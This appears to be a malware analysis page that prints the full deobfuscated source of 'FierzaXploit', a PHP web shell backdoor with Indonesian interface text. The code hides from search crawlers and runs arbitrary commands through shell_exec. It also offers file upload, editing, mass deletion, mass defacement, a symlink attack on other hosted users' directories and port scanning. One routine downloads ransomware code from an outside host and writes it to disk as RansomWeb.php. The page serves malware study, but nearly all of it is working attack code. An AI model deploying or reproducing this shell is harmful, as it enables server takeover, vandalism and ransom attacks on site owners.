PHP Malware Analysis

Back to list

Filename: mek.pHP

Tags

Encoding
  • base64_decode
URLs
Emails
  • bootstrap@5.0.2
  • bootstrap-icons@1.5.0
  • name@example.com
Title
  • FierzaXploit
Execution
  • shell_exec
Input
  • _GET
  • _POST
  • _FILES
Environment
  • set_time_limit
  • error_reporting
  • php_uname
  • getcwd
Files
  • file_get_contents
  • file_put_contents
  • move_uploaded_file

Deobfuscated code

<?php

echo null;
echo null;
$O5305 = 'g';
$O4994 = 'i';
$O9000 = 'z';
$O0763 = 'c';
$O1860 = '6';
$O8797 = 'o';
$O9366 = 'v';
$O9137 = '4';
$O5319 = 'n';
$O7407 = 's';
$O8539 = 'l';
$O5781 = 'r';
$O1333 = 'f';
$O4387 = 'e';
$O2275 = 'd';
$O3314 = 't';
$O9467 = 'b';
$O8018 = 'a';
$O9705 = '_';
$O6447 = "strrev";
$O3361 = "gzinflate";
$O7244 = "base64_decode";
eval /* PHPDeobfuscator eval output */ {
    $iTOo = 'd';
    $J = 's';
    $idmTZ = 'f';
    $yV = 'n';
    $vKvx = 'e';
    $fMB = 'l';
    $gjtc = '4';
    $s = 'v';
    $SgYt = '_';
    $CuI = 'a';
    $C = 'i';
    $HNqgu = 'o';
    $bGI = 'r';
    $awP = 't';
    $CN = 'g';
    $TiF = 'c';
    $ZhtVq = 'b';
    $q = 'z';
    $vn = '6';
    $eXI = "base64_decode";
    $Dpa = "strrev";
    $qJyu = "gzinflate";
    eval /* PHPDeobfuscator eval output */ {
        $__ = "s9YEg9SUfGcVjbLUoqKSYg0gJzk1Jd7ELLU4MUnD2LAkvygeLF6SmJOWl1mVrlFcnFpUkJufnFdala6gp66WXmJtr66Rk1iWCgA=";
        $Code = "";
        eval /* PHPDeobfuscator eval output */ {
            echo null;
            header("X-XSS-Protection: 0");
            ob_start();
            set_time_limit(0);
            error_reporting(0);
            http_response_code(404);
            @clearstatcache();
            @ini_set("log_errors", 0);
            @ini_set("memory_limit", 0);
            @ini_set("max_execution_time", 0);
            @ini_set("output_buffering", 0);
            @ini_set("display_errors", 0);
            if (!empty($_SERVER["HTTP_USER_AGENT"])) {
                $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
                if (preg_match("/Googlebot|Slurp|MSNBot|PycURL|facebookexternalhit|ia_archiver|crawler|Yandex|Rambler|Yahoo! Slurp|YahooSeeker|bingbot|curl/i", $_SERVER["HTTP_USER_AGENT"])) {
                    header("HTTP/1.0 404 Not Found");
                    die;
                }
            }
            if (!empty($_GET["path"])) {
                chdir(htmlspecialchars($_GET["path"]));
            }
            if (isset($_GET["path"])) {
                $path = htmlspecialchars($_GET["path"]);
            } else {
                $path = getcwd();
            }
            function Notif()
            {
                $url = "https://github.com/FierzaEriez/FierzaEriez.github.io/blob/main/FX-Backdoor(1.4).php";
                $handle = curl_init($url);
                curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE);
                $response = curl_exec($handle);
                $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE);
                curl_close($handle);
                return $httpCode;
            }
            $ResponseCode = Notif();
            @null;
            ?>
<!doctype html>
<html id="up" lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="msapplication-TileImage" content="https://i.ibb.co/HGNQWNW/fococlipping-20211224-85315.png">

    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"/>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.5.0/font/bootstrap-icons.css">
    
    <link class="img-thumbnail" rel="shortcut icon" href="https://i.ibb.co/HGNQWNW/fococlipping-20211224-85315.png" />
    <?php 
            echo null;
            echo "<title>FierzaXploit</title>";
            @null;
            ?>

    <link rel="stylesheet" href="https://fierzaeriez.github.io/gayaku.css">

    <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <script src="https://fierzaeriez.github.io/battery.js"></script>

    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>

    <link rel="stylesheet" href="https://fierzaeriez.github.io/battery.css">
</head>
<body class="bg-dark animate__animated animate__fadeIn">
    <nav class="nav-batrei navbar navbar-expand-sm navbar-dark bg-dark fixed-top">
      <div class="container-fluid">
        <p class="text-white mt-2"><i class="bi bi-check-circle"></i> Version : 1.3 (release)</p>
        <div class="ms-auto">
          <div class="btn-group tombol-batrei">
              <div class="dropdown">
                <button class="btn btn-dark btn-sm mt-0 dropdown-toggle" type="button" id="dropdownMenu2" data-bs-toggle="dropdown" aria-expanded="false">
                    <i class="bi bi-bell-fill"></i>
                    <?php 
            if ($ResponseCode == 200) {
                ?>
                        <span class="badge bg-danger">1</span>
                    <?php 
            }
            ?>
                </button>
                <div id="notif" class="dropdown-menu dropdown-menu-end" aria-labelledby="dropdownMenu2">
                    <?php 
            if ($ResponseCode == 200) {
                echo "<script>Swal.fire(\n                                'UPDATE!!!!',\n                                'Versi Terbaru FX Shell Telah Hadir',\n                                'warning'\n                            );</script>\n                            <div class='container-fluid'>\n                                <center>New version 1.4</center>\n                                <a class='mt-3 tombol btn btn-success' href='https://github.com/FierzaEriez/FierzaEriez.github.io/blob/main/FX-Backdoor(1.4).php'>Download Now</a>\n                            </div>";
            } else {
                echo "\n                            <div class='container-fluid'>\n                                <ul class='list-group'>\n                                    <li class='list-group-item active' aria-current='true'><center>Version 1.3</center></li>\n                                    <li class='list-group-item'>Port Scanner</li>\n                                    <li class='list-group-item'>Fix Bug Xss</li>\n                                    <li class='list-group-item'>Fix Bug<br>Html Injection</li>\n                                    <li class='list-group-item'>Fix User Interface</li>\n                                    <li class='list-group-item'>Fix Logo</li>\n                                    <li class='list-group-item'>Fix CSS</li>\n                                </ul>\n                            </div>";
            }
            ?>
                </div>
            </div>
              
              <button class="btn btn-dark btn-sm dropdown-toggle" type="button" data-bs-toggle="dropdown" aria-expanded="false">
                <i id="baterainya"></i>
              </button>
            <ul class="dropdown-menu dropdown-menu-end">
              <li>
                <h5 class="geser">Battery :</h5>
                <center>
                  <h5 id="batre"></h5>
                </center>
              </li>
              <hr>
              <li class="geser st">
                <div id="charging">(charging state unknown)</div>
                <div id="dischargingTime">(discharging time unknown)</div>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </nav>
    <br><br>

    <hr class="mt-1 bg-light">
    
    <div class="mt-4 shell container-fluid">
    <center><img class="gambar bg-dark border-dark" src="https://i.ibb.co/HGNQWNW/fococlipping-20211224-85315.png" alt="" width="55" height="55"
                        class="d-inline-block align-text-top"><br><label for="exampleFormControlInput1" class="mb-1 text-white form-label">- FierzaXploit -<br>Simple,Responsive & Powerfull</label></center>
        <!-- navbar -->
        <nav class="mt-1 navbar navbar-expand-lg navbar-light bg-dark">
            <div class="container-fluid">
                <h4 class="navbar-brand">
                    <b>FierzaXploit</b></br>
                </h4>
            
                <button class="btn btn-dark" type="button" data-bs-toggle="offcanvas" data-bs-target="#offcanvasExample" aria-controls="offcanvasExample">
                    <b><font><i class="bi bi-menu-up"></i></font> Menu</b>
                </button>

                <div class="offcanvas offcanvas-start" tabindex="-1" id="offcanvasExample" aria-labelledby="offcanvasExampleLabel">
                    <div class="offcanvas-header">
                        <h5 class="offcanvas-title" id="offcanvasExampleLabel"><b><font><i class="bi bi-menu-up"></i></font> Menu</b></h5>
                        <button type="button" class="btn-close text-reset" data-bs-dismiss="offcanvas" aria-label="Close"></button>
                    </div>
                    <hr class="mt-1 mb-1">
                    <div class="offcanvas-body bodi">
                        <div class="dropdown mt-1">
                            <button class="btn btn-light dropdown-toggle" type="button" id="dropdownMenuButton" data-bs-toggle="dropdown">
                            <i class="bi bi-gear-wide-connected"></i> Our Tools
                            </button>
                            <ul class="dropdown-menu" aria-labelledby="navbarDropdownMenuLink">
                                <li>
                                    <?php 
            echo "<a class=\"dropdown-item\" href=\"?path" . $path . "&aksi=massdel\">Mass Delete</a>";
            ?>
                                </li>
                                <li>
                                    <?php 
            echo "<a class=\"dropdown-item\" href=\"?path=" . $path . "&aksi=massdeface\">Mass Deface</a>";
            ?>
                                </li>
                                <li>
                                    <?php 
            echo "<a class=\"dropdown-item\" href=\"?path=" . $path . "&aksi=symlink\">Symlink</a>";
            ?>
                                </li>
                                <li>
                                    <?php 
            echo "<a class=\"dropdown-item\" href=\"?path=" . $path . "&aksi=portscan\">Port Scanner</a>";
            ?>
                                </li>
                            </ul>
                        </div>
                        <a class="btn btn-light" data-bs-toggle="collapse" href="#multiCollapseExample1" role="button" aria-expanded="false" aria-controls="multiCollapseExample1"><i class="bi bi-info-circle"></i> About Shell</a>
                        <div class="col">
                            <div class="collapse multi-collapse" id="multiCollapseExample1">
                                <div class="card card-body">
                                    <b>FierzaXploit Shell Backdoor</b><hr>
                                    <p>   Adalah shell bypass dengan UI Yang apik & Responsive, Cocok digunakan untuk anda yang<br> tidak memiliki laptop/personal komputer.<br>Author : FierzaXploit/Mr.MF33</p>
                                </div>
                            </div>
                        </div>
                        <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
                        <hr class="pembatas">
                        <p><i class="bi bi-check-circle"></i> Version : 1.3 (release)</p>
                    </div>
                </div>
            </div>
        </nav>
        <!-- akhir navbar -->
    <!-- list file/folder -->
    <div class="container-fluid">
        <div class="row">
        <?php 
            function browsernya()
            {
                $browser = '';
                if (strpos($_SERVER["HTTP_USER_AGENT"], "Netscape")) {
                    $browser = "Netscape";
                    echo "Netscape";
                } else {
                    if (strpos($_SERVER["HTTP_USER_AGENT"], "Firefox")) {
                        $browser = "Mozilla Firefox";
                        echo "Mozilla Firefox";
                    } else {
                        if (strpos($_SERVER["HTTP_USER_AGENT"], "Chrome")) {
                            $browser = "Google Chrome";
                            echo "Google Chrome";
                        } else {
                            if (strpos($_SERVER["HTTP_USER_AGENT"], "Opera")) {
                                $browser = "Opera";
                                echo "Opera";
                            } else {
                                if (strpos($_SERVER["HTTP_USER_AGENT"], "MSIE")) {
                                    $browser = "Internet Explorer";
                                    echo "Internet Explorer";
                                } else {
                                    $browser = "Lainnya";
                                    echo "Lainnya";
                                }
                            }
                        }
                    }
                }
            }
            echo "\n        <a class=\"information-server text-decoration-none btn-md text-white text-start bg-dark\" data-bs-toggle=\"collapse\" href=\"#collapseExample\" role=\"button\" aria-expanded=\"false\" aria-controls=\"collapseExample\">\n            <p class=\"\"><i class=\"bi bi-info-circle-fill\"></i> Information Server <i class=\"bi bi-chevron-down\"></i></p>\n        </a>\n        <div class=\"collapse\" id=\"collapseExample\">\n            <div class=\"card card-body bg-dark\">\n                <div class=\"text-white bg-dark tablenya\">\n                        <ul class=\"mb-1\">\n                            <li>Website : " . $_SERVER["SERVER_NAME"] . "</li>\n                            <li>Ip Address : " . $_SERVER["SERVER_ADDR"] . "</li>\n                            <li>Port : " . $_SERVER["SERVER_PORT"] . "</li>\n                            <li>Kernel : " . php_uname() . "</li>\n                            <li>Protokol : " . $_SERVER["SERVER_PROTOCOL"] . "</li>\n                            <li>Save Data : " . $_SERVER["HTTP_SAVE_DATA"] . "</li>\n                            <li>Koneksi : " . $_SERVER["HTTP_CONNECTION"] . "</li>\n                            <li>Server : " . $_SERVER["SERVER_SOFTWARE"] . "</li>\n                            <li>Root : " . $_SERVER["DOCUMENT_ROOT"] . "</li>\n                            <li>G-Interface : " . $_SERVER["GATEWAY_INTERFACE"] . "</li>\n                            <li>R-Method : " . $_SERVER["REQUEST_METHOD"] . "</li>\n                            ";
            ?>
                            <li>Browser : <?php 
            browsernya();
            ?>
</li>
                        </ul>
                </div>
            </div>
        </div>
        <?php 
            $path = str_replace("\\", "/", $path);
            $paths = explode("/", $path);
            echo "<p class='mt-1 tulisan tablenya'><i size='15' class=\"pathnya bi bi-folder2-open\"></i> : ~ ";
            foreach ($paths as $id => $pat) {
                if ($pat == '' && $id == 0) {
                    $a = true;
                    echo "\n                <a class=\"path\" href=\"?path=/\">/</a></li>";
                    continue;
                }
                if ($pat == '') {
                    continue;
                }
                echo "<a href=\"?path=";
                for ($i = 0; $i <= $id; $i++) {
                    echo "{$paths[$i]}";
                    if ($i != $id) {
                        echo "/";
                    }
                }
                echo "\" class=\"path\">" . $pat . "</a>/";
            }
            echo "<br><a href=\"?home\" class=\"mt-2 linknya btn btn-light btn-sm\"><i class=\"text-dark bi bi-house-door-fill\"></i></a>";
            if ($_GET["aksi"] == "symlink") {
                if (!is_file("named.txt")) {
                    $d00m = @file("/etc/named.conf");
                } else {
                    $d00m = @file("named.txt");
                }
                if (!$d00m) {
                    echo "<center>\n            <br/>\n            <font color='red'>Gagal Membaca /etc/named.conf</font>\n            <br/><br/></center>";
                } else {
                    echo "<center>\n        <div class='tmp'></center>\n            <table align='center' width='100%'>\n                <thead class='bg-info'>\n                    <th>Domains</th>\n                    <th>Users</th>\n                    <th>symlink </th>\n                </thead>";
                    foreach ($d00m as $dom) {
                        if (eregi("zone", $dom)) {
                            preg_match_all("#zone \"(.*)\"#", $dom, $domsws);
                            flush();
                            if (strlen(trim($domsws[1][0])) > 2) {
                                $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domsws[1][0]));
                                flush();
                                $site = $user["name"];
                                @symlink("/", "sym/root");
                                $site = $domsws[1][0];
                                $ir = "ir";
                                $il = "il";
                                if (preg_match("/.^ir/", $domsws[1][0]) or preg_match("/.^il/", $domsws[1][0])) {
                                    $site = ".{$domsws["1"]}[0].";
                                }
                                echo "\n                            <tr>\n                                <td>\n                                    <a target='_blank' href=http://www." . $domsws[1][0] . "/>" . $site . " </a>\n                                </td>\n                                <td>\n                                    " . $user["name"] . "\n                                </td>\n                                <td>\n                                    <a href='sym/root/home/" . $user["name"] . "/public_html' target='_blank'>Symlink</a>\n                                </td>\n                            </tr>";
                                flush();
                                flush();
                            }
                        }
                    }
                    echo "</table>\n                </div><br><br>";
                }
            }
            if ($_GET["aksi"] == "massdel") {
                function hapus_massal($dir, $namafile)
                {
                    if (is_writable($dir)) {
                        $dira = scandir($dir);
                        foreach ($dira as $dirb) {
                            $dirc = "{$dir}/{$dirb}";
                            $lokasi = $dirc . "/" . $namafile;
                            if ($dirb === ".") {
                                if (file_exists("{$dir}/{$namafile}")) {
                                    unlink("{$dir}/{$namafile}");
                                }
                            } elseif ($dirb === "..") {
                                if (file_exists('' . dirname($dir) . "/{$namafile}")) {
                                    unlink('' . dirname($dir) . "/{$namafile}");
                                }
                            } else {
                                if (is_dir($dirc)) {
                                    if (is_writable($dirc)) {
                                        if ($lokasi) {
                                            echo "{$lokasi} > Terhapus\n";
                                            unlink($lokasi);
                                            $massdel = hapus_massal($dirc, $namafile);
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
                if ($_POST["start"]) {
                    echo "<textarea class='form-control' rows='8' disabled='disabled'>";
                    hapus_massal($_POST["d_dir"], $_POST["d_file"]);
                    echo "</textarea><a href='?dir={$dir}' class='btn btn-info btn-block mt-3'>Kembali</a>";
                } else {
                    echo "<center><p class='text-white'>{ Mass Delete }</p></center>\n                <form method='post'>\n                <p class='text-white'><i class='fa fa-folder'></i> Lokasi</p>\n                <input type='text' name='d_dir' value='{$dir}' class='form-control'><br>\n                <p class='text-white'><i class ='fa fa-file'></i> Nama File</p>\n                <input type='text' name='d_file' placeholder='index.php' class='form-control'><br>\n                <input type='submit' name='start' value='Hapus' class='btn btn-danger form-control'>\n                <br><br>\n                </form>";
                }
            }
            if ($_GET["aksi"] == "massdeface") {
                function tipe_massal($dir, $namafile, $isi_script)
                {
                    if (is_writable($dir)) {
                        $dira = scandir($dir);
                        foreach ($dira as $dirb) {
                            $dirc = "{$dir}/{$dirb}";
                            $lokasi = $dirc . "/" . $namafile;
                            if ($dirb === ".") {
                                file_put_contents($lokasi, $isi_script);
                            } elseif ($dirb === "..") {
                                file_put_contents($lokasi, $isi_script);
                            } else {
                                if (is_dir($dirc)) {
                                    if (is_writable($dirc)) {
                                        echo "Berhasil => {$lokasi}\n";
                                        file_put_contents($lokasi, $isi_script);
                                        $MassDeface = tipe_massal($dirc, $namafile, $isi_script);
                                    }
                                }
                            }
                        }
                    }
                }
                function tipe_biasa($dir, $namafile, $isi_script)
                {
                    if (is_writable($dir)) {
                        $dira = scandir($dir);
                        foreach ($dira as $dirb) {
                            $dirc = "{$dir}/{$dirb}";
                            $lokasi = $dirc . "/" . $namafile;
                            if ($dirb === ".") {
                                file_put_contents($lokasi, $isi_script);
                            } elseif ($dirb === "..") {
                                file_put_contents($lokasi, $isi_script);
                            } else {
                                if (is_dir($dirc)) {
                                    if (is_writable($dirc)) {
                                        echo "Berhasil => {$dirb}/{$namafile}\n";
                                        file_put_contents($lokasi, $isi_script);
                                    }
                                }
                            }
                        }
                    }
                }
                if ($_POST["start"]) {
                    echo "<textarea class='form-control' rows='8' disabled='disabled'>";
                    if ($_POST["tipe"] == "mahal") {
                        tipe_massal($_POST["d_dir"], $_POST["d_file"], $_POST["script"]);
                    } elseif ($_POST["tipe"] == "murah") {
                        tipe_biasa($_POST["d_dir"], $_POST["d_file"], $_POST["script"]);
                    }
                    echo "</textarea><a href='?dir={$dir}' class='btn btn-info btn-block mt-3'>Kembali</a>";
                } else {
                    echo "<form method='post'>\n            <center>\n                <p class='text-white'>{ Mass Deface }</p>\n                <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>\n                <label for='toggle-on' class='text-white butn'>Biasa</label>\n                <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>\n                <label for='toggle-off' class='butn text-white'>Masal</label>\n            </center><hr>\n            <p class='text-white'><i class='fa fa-folder'></i> Lokasi</p>\n            <input type='text' name='d_dir' value='{$dir}' class='form-control'><br>\n            <p class='text-white'><i class ='fa fa-file'></i> Nama File</p>\n            <input type='text' name='d_file' placeholder='index.php' class='form-control'><br/>\n            <p class='text-white'><i class ='fa fa-file'></i> Isi File</p>\n            <textarea name='script' class='form-control' rows='5' placeholder='Hacked By Mr.MF33'></textarea><br/>\n            <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>\n            <br><br>\n            </form>";
                }
            }
            if (isset($_POST["btn"])) {
                $nama = $_FILES["upl"]["name"];
                $lokasi = $_FILES["upl"]["tmp_name"];
                $folder = '';
                if (move_uploaded_file($lokasi, $folder . $nama)) {
                    echo "<script>Swal.fire(\n                    'Berhasil',\n                    'File Sukses Diupload',\n                    'success'\n                ); window.location='?path=" . $path . "';</script>";
                } else {
                    echo "<script>Swal.fire(\n                    'Gagal',\n                    'File Gagal Diupload',\n                    'error'\n                ); window.location='?path=" . $path . "';</script>";
                }
            }
            echo "\n        <form method=\"post\" enctype=\"multipart/form-data\">\n            <div class=\"uploader file input-group input-group-sm mb-3 ms-auto\">\n                <input type=\"file\" name=\"upl\" class=\"form-control bg-dark text-white\" id=\"inputGroupFile04\" aria-describedby=\"inputGroupFileAddon04\" aria-label=\"Upload\">\n                <button name=\"btn\" class=\"btn btn-outline-light\" type=\"submit\" id=\"inputGroupFileAddon04\"><i class=\"bi bi-cloud-upload-fill\"></i> Upload</button>\n            </div>\n        </form>\n\n        <!-- tambah file/folder & ransomweb -->\n        <div class=\"tambah\">\n            <div class=\"container-fluid\">\n                <center>\n                    <div class=\"row row-cols-4\">\n                        <!-- tambah file -->\n                        <div class=\"col\">\n                            <a class=\"path\" href=\"?path=" . $path . "&aksi=buatfile\"><font size=\"5\"><i class=\"bi bi-file-earmark-plus-fill\"></i></font> File</a>\n                        </div>\n                        <!-- akhir tambah file -->\n\n                        <!-- tambah folder -->\n                        <div class=\"col\">\n                            <a class=\"path\" href=\"?path=" . $path . "&aksi=buatfolder\"><font size=\"5\"><i class=\"bi bi-folder-plus\"></i></font> Folder</a>\n                        </div>\n                        <!-- Akhir tambah folder -->\n\n                        <!-- terminal -->\n                        <div class=\"col\">\n                            <a class=\"path\" href=\"?path=" . $path . "&aksi=terminal\"><font size=\"5\"><i class=\"bi bi-terminal\"></i></font> Terminal</a>\n                        </div>\n                        <!-- Akhir terminal -->\n\n                        <!-- auto create ransomweb -->\n                        <div class=\"col\">\n                            <a class=\"path\" href=\"?path=" . $path . "&aksi=buatransom\"><font size=\"5\"><i class=\"bi bi-file-earmark-lock2-fill\"></i></font> Ransom<br>web</a>\n                        </div>\n                        <!-- akhir auto create ransomweb -->\n                    </div>\n                </center>\n            </div>\n        </div>\n        <!-- akhir tambah file/folder & ransomweb -->";
            if ($_GET["aksi"] == "terminal") {
                echo "<div class=\"alert\">\n                <button type=\"button\" class=\"btn btn-danger\" data-bs-dismiss=\"alert\" aria-label=\"Close\"><i class=\"bi bi-x-lg\"></i></button>\n                <form method=\"post\">\n                    <div class=\"input-group flex-nowrap\">\n                        <span class=\"input-group-text\" id=\"addon-wrapping\">root@User :~</span>\n                        <input type=\"text\" name=\"shell\" class=\"form-control\" placeholder=\"Your Command\" aria-label=\"Username\" aria-describedby=\"addon-wrapping\">\n                    </div>\n                </form>";
                if (isset($_POST["shell"])) {
                    $command = $_POST["shell"];
                    if (function_exists("shell_exec")) {
                        $shell = shell_exec($command);
                    } else {
                        echo "<script>Swal.fire(\n                            'Disabled Function',\n                            'error'\n                        )</script>";
                    }
                }
                echo "<div class=\"mb-3\">\n                <textarea class=\"form-control\" id=\"exampleFormControlTextarea1\" rows=\"20\" aria-label=\"readonly input example\" readonly>" . $shell . "</textarea>\n                <div id=\"emailHelp\" class=\"form-text\"><font color=\"white\">*NOTE : gunakan command sesuai os, jika os windows gunakan command cmd & jika os linux gunakan command linux<br>os = Operating System</font></div>\n            </div></div>";
            }
            if ($_GET["aksi"] == "buatransom") {
                $url = "https://shell.prinsh.com/Nathan/ransomware.txt";
                $curl = curl_init($url);
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                $get = curl_exec($curl);
                if ($get != '') {
                    $puts = fopen("RansomWeb.php", "w");
                    fwrite($puts, $get);
                    fclose($puts);
                    $nama_file = "RansomWeb.php";
                    $server_web = "http://" . $_SERVER["HTTP_HOST"] . "/";
                    if ($puts != '') {
                        echo "<script>Swal.fire(\n                        'Berhasil',\n                        'RansomWeb Sukses Dibuat',\n                        'success'\n                    ); window.location='?path=" . $path . "';</script>";
                    } else {
                        echo "<script>Swal.fire(\n                        'Gagal',\n                        'RansomWeb gagal Dibuat',\n                        'error'\n                    ); window.location='?path=" . $path . "';</script>";
                    }
                }
            }
            if ($_GET["aksi"] == "buatfolder") {
                if (isset($_POST["folderss"])) {
                    $folder = $_POST["namaF"];
                    $nama_folder = $path . "/" . $folder;
                    $buat_folder = mkdir($nama_folder);
                    if ($buat_folder) {
                        echo "<script>Swal.fire(\n                        'Berhasil',\n                        'Folder Sukses Dibuat',\n                        'success'\n                    ); window.location='?path=" . $path . "';</script>";
                    } else {
                        echo "<script>Swal.fire(\n                        'Gagal',\n                        'Folder Gagal Dibuat',\n                        'error'\n                    ); window.location='?path=" . $path . "';</script>";
                    }
                }
                echo "\n            <form method=\"POST\">\n                <label for=\"exampleFormControlInput1\" class=\"text-white label form-label texxt-white\">Nama Folder :</label>\n                <div class=\"tambahdir input-group mb-3\">\n                    <input name=\"namaF\" type=\"text\" class=\"form-control\" placeholder=\"Masukkan Nama Folder\" aria-describedby=\"button-addon2\">\n                    <button name=\"folderss\" class=\"klik btn btn-outline-secondary\" type=\"submit\" id=\"button-addon2\">Create Folder</button>\n                </div>  \n            </form>";
            }
            if ($_GET["aksi"] == "buatfile") {
                if (isset($_POST["buat"])) {
                    $nama_file = $path . "/" . $_POST["nama_file"];
                    $isi_file = $_POST["isi"];
                    $buat_file = fopen($nama_file, "w");
                    fwrite($buat_file, $isi_file);
                    fclose($buat);
                    if (empty($buat)) {
                        echo "<script>Swal.fire(\n                        'Berhasil',\n                        'File Sukses Dibuat',\n                        'success'\n                    ); window.location='?path=" . $path . "';</script>";
                    } else {
                        echo "<script>Swal.fire(\n                        'Gagal',\n                        'File Gagal Dibuat',\n                        'error'\n                    ); window.location='?path=" . $path . "';</script>";
                    }
                }
                echo "<div class=\"alert\">\n            <center><h4 class=\"text-white\">{ Buat File }</h4></center>\n            <form method=\"post\" class=\"mt-3\">\n            <div class=\"mb-3\">\n            <label for=\"exampleFormControlInput1\" class=\"text-white form-label\">Nama File :</label>\n            <input type=\"text\" name=\"nama_file\" placeholder=\"Masukkan Nama Filenya\" class=\"form-control\" id=\"exampleFormControlInput1\" placeholder=\"name@example.com\">\n        </div>\n        <div class=\"mb-3\">\n<label for=\"exampleFormControlTextarea1\" class=\"text-white form-label\">Isi File :</label>\n<textarea class=\"form-control\" name=\"isi\" placeholder=\"Masukkan Isi Filenya\" id=\"exampleFormControlTextarea1\" rows=\"3\"></textarea>\n</div><br>\n<button name=\"buat\" class=\"tombol btn btn-outline-success\" type=\"submit\">Create Now</button>\n</form>\n<br>\n<button type=\"button\" class=\"tombol btn btn-danger\" data-bs-dismiss=\"alert\" aria-label=\"Close\">Cancel</button>\n            </div>\n<br>";
            }
            if (isset($_GET["path_file"])) {
                $lihat = $_GET["path_file"];
            }
            if ($_GET["aksi"] == "view") {
                echo "<div class='alert'><button type=\"button\" class=\"btn btn-danger\" data-bs-dismiss=\"alert\" aria-label=\"Close\"><i class=\"bi bi-x-lg\"></i></button><center><textarea class=\"form-control prettyPrint\" id=\"exampleFormControlTextarea1\" rows=\"20\" disabled>" . htmlspecialchars(file_get_contents($lihat)) . "</textarea></center></div>";
            }
            if ($_GET["aksi"] == "portscan") {
                echo "<div class=\"alert\">\n                <div class=\"container-fluid\">\n                    <center><h5 class=\"text-white\">{ Port Scanner }</h5></center>\n                    <form method=\"POST\">\n                        <div class=\"mb-3\">\n                            <label for=\"exampleFormControlInput1\" class=\"text-white form-label\">URL :</label>\n                            <input type=\"text\" name=\"url\" class=\"form-control\" id=\"exampleFormControlInput1\" placeholder=\"google.com\">\n                        </div>\n                        <button type=\"submit\" name=\"scan\" class=\"tombol btn btn-success\">Scan Now</button>\n                    </form>\n                    <button type=\"button\" class=\"mt-1 btn btn-danger tombol\" data-bs-dismiss=\"alert\" aria-label=\"Close\">Cancel</button>\n                     <br> <p class=\"text-white\">Result : </p>";
                function PortScanner($target)
                {
                    $portnya = array(20, 21, 22, 23, 25, 42, 53, 67, 80, 81, 110, 143, 443, 587, 1337, 2525, 3306);
                    foreach ($portnya as $port) {
                        $ConnPort = @fsockopen($target, $port, $errno, $errstr, 2);
                        if (is_resource($ConnPort)) {
                            echo "<p class='text-white'>" . $target . ": " . $port . "( " . getservbyport($port, "tcp") . " ) <font color='green'><b>Port Is Open</b></font></p> <br>";
                        } else {
                            echo "<p class='text-white'>" . $target . ": " . $port . "( " . getservbyport($port, "tcp") . " ) <font color='red'><b>Port Is Close</b></font></p> <br>";
                        }
                    }
                    return $ConnPort;
                }
                if (isset($_POST["scan"])) {
                    $ResultScan = PortScanner($_POST["url"]);
                }
                $ResultScan;
                echo "              \n                </div>\n            </div>";
            }
            $scandir = scandir($path);
            if ($_GET["aksi"] == "rename") {
                if (isset($_POST["rename_now"])) {
                    $new_name = $_POST["newname"];
                    $rename_file = rename($new_name, $_GET["nama_file"]);
                    if (file_exists($rename_file)) {
                        echo "<script>alert('Nama File Sudah Digunakan')</script>";
                    } else {
                        if (rename($_GET["nama_file"], $new_name)) {
                            echo "<script>Swal.fire(\n                            'Berhasil',\n                            'File Sukses Direname',\n                            'success'\n                        ); window.location='?path=" . $path . "';</script>";
                        } else {
                            echo "<script>Swal.fire(\n                            'Gagal',\n                            'file Gagal Direname',\n                            'error'\n                        ); window.location='?path=" . $path . "';</script>";
                        }
                    }
                }
                echo "<div class=\"alert\">\n            <form method=\"POST\">\n            <div class=\"mb-3\">\n            <label for=\"exampleFormControlInput1\" class=\"text-white form-label\">Name File/Directory</label>\n            <input name=\"newname\" type=\"text\" class=\"form-control\" id=\"exampleFormControlInput1\" value=\"" . $_GET["nama_file"] . "\" placeholder=\"New Name\">\n            </div>\n        <br>\n        <input type=\"submit\" name=\"rename_now\" value=\"Rename Now\" class=\"tombol btn btn-outline-secondary btn-block\">\n        </form>\n        <br>\n        <button type=\"button\" class=\"tombol btn btn-danger\" data-bs-dismiss=\"alert\" aria-label=\"Close\">Cancel</button>\n        </div>";
            }
            if ($_GET["aksi"] == "edit") {
                if (isset($_POST["save"])) {
                    $fp = fopen($_GET["dirf"], "w");
                    $hasil = fwrite($fp, $_POST["src"]);
                    if ($hasil) {
                        echo "<script>Swal.fire(\n                        'Berhasil',\n                        'File Sukses Diedit',\n                        'success'\n                    ); window.location='?path=" . $path . "';</script>";
                    } else {
                        echo "<script>Swal.fire(\n                        'Gagal',\n                        'File Gagal Diedit',\n                        'error'\n                    ); window.location='?path=" . $path . "';</script>";
                    }
                }
